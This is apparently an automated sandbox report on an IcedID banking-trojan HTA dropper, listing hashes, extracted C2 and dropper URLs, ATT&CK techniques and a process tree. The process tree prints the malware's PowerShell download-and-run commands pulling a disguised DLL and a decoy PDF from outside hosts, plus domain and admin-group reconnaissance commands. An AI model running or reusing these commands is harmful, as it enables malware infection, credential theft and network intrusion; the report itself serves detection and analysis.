icedid | c815343206eab5b6d29bea2d12f02bf8f446944554f053203afc414acc77e859

General

Target

2.hta
Size

1KB
MD5

78b6f14f36098c269c3d03a29eb35bc8
SHA1

afd76bfe0d6ac105730b218152d0a650b6a869b7
SHA256

c815343206eab5b6d29bea2d12f02bf8f446944554f053203afc414acc77e859
SHA512

57b5a24f6c2610961e5c08d64872290d5b1399a80fc4335e60b88e3d20a679576a108d313b9a710b59e604732e0ea6e91313d65e16a10eb3eda3fe4e503d9712

Score

10^/10

icedid 3954321778 banker collection loader spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://helthbrotthersg.com/view.png

Extracted

Language

ps1

Source

URLs

exe.dropper

https://transfer.sh/get/vpiHmi/invoice.pdf

Extracted

Family

icedid

Campaign

3954321778

C2

ehonlionetodo.com

Signatures

IcedID, BokBot
IcedID is a banking trojan capable of stealing credentials.
trojan banker icedid

Blocklisted process makes network request 10 IoCs

Processes:

mshta.exepowershell.exepowershell.exerundll32.exe

flow	pid	process
6	1648	mshta.exe
8	1648	mshta.exe
18	212	powershell.exe
20	3644	powershell.exe
52	1608	rundll32.exe
61	1608	rundll32.exe
62	1608	rundll32.exe
63	1608	rundll32.exe
65	1608	rundll32.exe
68	1608	rundll32.exe

Downloads MZ/PE file
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

mshta.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation mshta.exe
Loads dropped DLL 3 IoCs

Processes:

rundll32.exerundll32.exe

pid process

3644 rundll32.exe
1608 rundll32.exe
1608 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation	mshta.exe

pid	process
3644	rundll32.exe
1608	rundll32.exe
1608	rundll32.exe

Accesses Microsoft Outlook profiles 1 TTPs 7 IoCs

collection

Email Collection

T1114

Processes:

rundll32.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	rundll32.exe
Key opened	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	rundll32.exe
Key opened	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	rundll32.exe
Key opened	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	rundll32.exe
Key opened	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	rundll32.exe
Key opened	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	rundll32.exe
Key opened	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	rundll32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

AcroRd32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe

Discovers systems in the same network 1 TTPs 2 IoCs
discovery

Remote System Discovery
T1018

Processes:

net.exenet.exe

pid process

2300 net.exe
1532 net.exe
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

ipconfig.exe

pid process

1884 ipconfig.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

432 systeminfo.exe

pid	process
2300	net.exe
1532	net.exe

pid	process
1884	ipconfig.exe

pid	process
432	systeminfo.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

AcroRd32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 3 IoCs

Processes:

powershell.exerundll32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\CLSID\{9190DBCF-1D27-13D3-9892-02F4385A3FD9}	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\CLSID\{9190DBCF-1D27-13D3-9892-02F4385A3FD9}\ = 8e11aadfb83d92512e782a3f6b8a29b0794bd1622b2afd06531b56d389506774982cca77dae674020def0755ad1daf897afb33ae1a3d073bc692eca01adde7ed97d412319f27f3680743d3139d71309686aa4f63389b552442df4c34ec65552afd9e5b360e0300962d23cacf9386172a8ee4956d5967a0db0f7c6b56cadb43320ac11b7ca94ba23420d80d5942c919e675b00f2da58825970ed19938b7eb9d3bc8928675130d25de0857dc096e3c5dcc992f5f4ea792a5c814ef6969c98d3fcbedfe264fd665accee1d4ac8a98b305535dd81327ba9e20144c30c897fb453c	rundll32.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 28 IoCs

Processes:

powershell.exepowershell.exeAcroRd32.exerundll32.exe

pid	process
3644	powershell.exe
212	powershell.exe
3644	powershell.exe
212	powershell.exe
4924	AcroRd32.exe
4924	AcroRd32.exe
4924	AcroRd32.exe
4924	AcroRd32.exe
4924	AcroRd32.exe
4924	AcroRd32.exe
4924	AcroRd32.exe
4924	AcroRd32.exe
4924	AcroRd32.exe
4924	AcroRd32.exe
4924	AcroRd32.exe
4924	AcroRd32.exe
4924	AcroRd32.exe
4924	AcroRd32.exe
4924	AcroRd32.exe
4924	AcroRd32.exe
4924	AcroRd32.exe
4924	AcroRd32.exe
4924	AcroRd32.exe
4924	AcroRd32.exe
1608	rundll32.exe
1608	rundll32.exe
1608	rundll32.exe
1608	rundll32.exe

Suspicious use of AdjustPrivilegeToken 44 IoCs

Processes:

powershell.exepowershell.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	212	powershell.exe
Token: SeDebugPrivilege	3644	powershell.exe
Token: SeIncreaseQuotaPrivilege	2928	WMIC.exe
Token: SeSecurityPrivilege	2928	WMIC.exe
Token: SeTakeOwnershipPrivilege	2928	WMIC.exe
Token: SeLoadDriverPrivilege	2928	WMIC.exe
Token: SeSystemProfilePrivilege	2928	WMIC.exe
Token: SeSystemtimePrivilege	2928	WMIC.exe
Token: SeProfSingleProcessPrivilege	2928	WMIC.exe
Token: SeIncBasePriorityPrivilege	2928	WMIC.exe
Token: SeCreatePagefilePrivilege	2928	WMIC.exe
Token: SeBackupPrivilege	2928	WMIC.exe
Token: SeRestorePrivilege	2928	WMIC.exe
Token: SeShutdownPrivilege	2928	WMIC.exe
Token: SeDebugPrivilege	2928	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2928	WMIC.exe
Token: SeRemoteShutdownPrivilege	2928	WMIC.exe
Token: SeUndockPrivilege	2928	WMIC.exe
Token: SeManageVolumePrivilege	2928	WMIC.exe
Token: 33	2928	WMIC.exe
Token: 34	2928	WMIC.exe
Token: 35	2928	WMIC.exe
Token: 36	2928	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2928	WMIC.exe
Token: SeSecurityPrivilege	2928	WMIC.exe
Token: SeTakeOwnershipPrivilege	2928	WMIC.exe
Token: SeLoadDriverPrivilege	2928	WMIC.exe
Token: SeSystemProfilePrivilege	2928	WMIC.exe
Token: SeSystemtimePrivilege	2928	WMIC.exe
Token: SeProfSingleProcessPrivilege	2928	WMIC.exe
Token: SeIncBasePriorityPrivilege	2928	WMIC.exe
Token: SeCreatePagefilePrivilege	2928	WMIC.exe
Token: SeBackupPrivilege	2928	WMIC.exe
Token: SeRestorePrivilege	2928	WMIC.exe
Token: SeShutdownPrivilege	2928	WMIC.exe
Token: SeDebugPrivilege	2928	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2928	WMIC.exe
Token: SeRemoteShutdownPrivilege	2928	WMIC.exe
Token: SeUndockPrivilege	2928	WMIC.exe
Token: SeManageVolumePrivilege	2928	WMIC.exe
Token: 33	2928	WMIC.exe
Token: 34	2928	WMIC.exe
Token: 35	2928	WMIC.exe
Token: 36	2928	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

AcroRd32.exe

pid process

4924 AcroRd32.exe
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

AcroRd32.exe

pid process

4924 AcroRd32.exe
4924 AcroRd32.exe
4924 AcroRd32.exe
4924 AcroRd32.exe
4924 AcroRd32.exe
4924 AcroRd32.exe

pid	process
4924	AcroRd32.exe

pid	process
4924	AcroRd32.exe
4924	AcroRd32.exe
4924	AcroRd32.exe
4924	AcroRd32.exe
4924	AcroRd32.exe
4924	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

mshta.exepowershell.exeAcroRd32.exeRdrCEF.exe

description	pid	process	target process
PID 1648 wrote to memory of 212	1648	mshta.exe	powershell.exe
PID 1648 wrote to memory of 212	1648	mshta.exe	powershell.exe
PID 1648 wrote to memory of 212	1648	mshta.exe	powershell.exe
PID 1648 wrote to memory of 3644	1648	mshta.exe	powershell.exe
PID 1648 wrote to memory of 3644	1648	mshta.exe	powershell.exe
PID 1648 wrote to memory of 3644	1648	mshta.exe	powershell.exe
PID 3644 wrote to memory of 4924	3644	powershell.exe	AcroRd32.exe
PID 3644 wrote to memory of 4924	3644	powershell.exe	AcroRd32.exe
PID 3644 wrote to memory of 4924	3644	powershell.exe	AcroRd32.exe
PID 4924 wrote to memory of 2124	4924	AcroRd32.exe	RdrCEF.exe
PID 4924 wrote to memory of 2124	4924	AcroRd32.exe	RdrCEF.exe
PID 4924 wrote to memory of 2124	4924	AcroRd32.exe	RdrCEF.exe
PID 2124 wrote to memory of 1692	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1692	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1692	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1692	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1692	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1692	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1692	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1692	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1692	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1692	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1692	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1692	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1692	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1692	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1692	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1692	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1692	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1692	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1692	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1692	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1692	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1692	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1692	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1692	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1692	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1692	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1692	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1692	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1692	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1692	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1692	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1692	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1692	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1692	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1692	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1692	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1692	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1692	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1692	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1692	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1692	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1952	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1952	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1952	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1952	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1952	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1952	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1952	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1952	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1952	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1952	2124	RdrCEF.exe	RdrCEF.exe
PID 2124 wrote to memory of 1952	2124	RdrCEF.exe	RdrCEF.exe

outlook_office_path 1 IoCs

Processes:

rundll32.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	rundll32.exe

outlook_win_path 1 IoCs

Processes:

rundll32.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	rundll32.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\2.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1648

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Exec Bypass -NoP -C (new-object system.net.webclient).downloadFile('http://helthbrotthersg.com/view.png', 'C:\Users\Public\classic.jpg')
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:212

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Exec Bypass -NoP -C (new-object system.net.webclient).downloadFile('https://transfer.sh/get/vpiHmi/invoice.pdf', 'C:\Users\Public\invoice.pdf'); Start-Process C:\Users\Public\invoice.pdf
2⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3644

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Public\invoice.pdf"
3⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4924

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
4⤵
- Suspicious use of WriteProcessMemory
PID:2124

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F0CAFC6F08744F76686BF1AE0D8A9667 --mojo-platform-channel-handle=1736 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
5⤵
PID:1692

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=2C7E8C8B473A9F79B0E04F415CCB4DE1 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=2C7E8C8B473A9F79B0E04F415CCB4DE1 --renderer-client-id=2 --mojo-platform-channel-handle=1752 --allow-no-sandbox-job /prefetch:1
5⤵
PID:1952

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=9C6032725D176595BE55D04BFF5124A6 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=9C6032725D176595BE55D04BFF5124A6 --renderer-client-id=4 --mojo-platform-channel-handle=2192 --allow-no-sandbox-job /prefetch:1
5⤵
PID:4656

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=1E2D3BA7BF4B4722F27FD1E1C2C18A9B --mojo-platform-channel-handle=2572 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
5⤵
PID:3572

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=39F80FA30618790DB44C61B523B1FED1 --mojo-platform-channel-handle=2696 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
5⤵
PID:2728

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=697FB9A370942C109905CCE604F16146 --mojo-platform-channel-handle=2800 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
5⤵
PID:4308

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Public\classic.jpg,PluginInit
2⤵
- Loads dropped DLL
PID:3644

C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Public\classic.jpg,PluginInit
3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- outlook_office_path
- outlook_win_path
PID:1608

C:\Windows\system32\cmd.exe
cmd.exe /c chcp >&2
4⤵
PID:2232

C:\Windows\system32\chcp.com
chcp
5⤵
PID:4288

C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2928

C:\Windows\system32\ipconfig.exe
ipconfig /all
4⤵
- Gathers network information
PID:1884

C:\Windows\system32\systeminfo.exe
systeminfo
4⤵
- Gathers system information
PID:432

C:\Windows\system32\net.exe
net config workstation
4⤵
PID:1356

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 config workstation
5⤵
PID:896

C:\Windows\system32\nltest.exe
nltest /domain_trusts
4⤵
PID:3900

C:\Windows\system32\nltest.exe
nltest /domain_trusts /all_trusts
4⤵
PID:4248

C:\Windows\system32\net.exe
net view /all /domain
4⤵
- Discovers systems in the same network
PID:2300

C:\Windows\system32\net.exe
net view /all
4⤵
- Discovers systems in the same network
PID:1532

C:\Windows\system32\net.exe
net group "Domain Admins" /domain
4⤵
PID:4984

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 group "Domain Admins" /domain
5⤵
PID:1964

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3884

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

1

T1059

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Credentials in Files

1

T1081

Discovery

Query Registry

2

T1012

System Information Discovery

5

T1082

Remote System Discovery

1

T1018

Lateral Movement

Collection

Data from Local System

1

T1005

Email Collection

1

T1114

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

